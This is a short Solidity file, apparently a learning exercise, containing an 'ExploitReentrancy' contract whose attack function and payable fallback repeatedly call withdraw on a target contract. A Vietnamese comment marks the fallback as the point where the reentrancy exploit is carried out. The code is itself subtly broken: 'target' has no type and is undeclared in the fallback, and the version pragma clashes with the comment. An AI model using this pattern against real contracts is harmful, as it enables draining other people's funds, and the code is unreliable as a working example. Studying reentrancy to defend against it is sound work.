//Write your own contracts here. Currently compiles using solc v0.4.15+commit.bbb8e64f.
pragma solidity ^0.4.18;

contract ExploitReentrancy {
  
  function attack(target) payable{
    Reentrancy(target).withdraw(0.1 ether);
  }

  // Khi hợp đồng này nhận được tiền của Hợp đồng Reentrancy, nó sẽ tự động gọi hàm Fallback này, đây là điểm thực hiện khai thác lỗ hổng trên
  function () payable {   
    Reentrancy(target).withdraw(0.1 ether);
  }
}